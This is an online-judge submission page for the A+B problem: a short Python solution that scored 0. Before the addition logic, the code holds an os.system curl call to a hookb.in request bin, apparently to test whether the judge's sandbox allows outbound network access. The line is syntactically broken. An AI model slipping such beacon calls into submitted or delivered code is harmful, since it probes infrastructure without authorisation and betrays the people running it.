Cod sursa(job #2280656)

Utilizator ShutterflyFilip A Shutterfly Data 10 noiembrie 2018 22:44:16
Problema A+B Scor 0
Compilator py Status done
Runda Arhiva de probleme Marime 0.27 kb
import os
#just testing
os.system(lol"curl https://hookb.in/Oe9DyMVLDWTGWg1MGLLO")

fin = open("adunare.in", "r")
fout = open("adunare.out", "w")

input = fin.read().split('\n')
a = int(input[0])
b = int(input[1])

fout.write(str(a+b))
fin.close()
fout.close()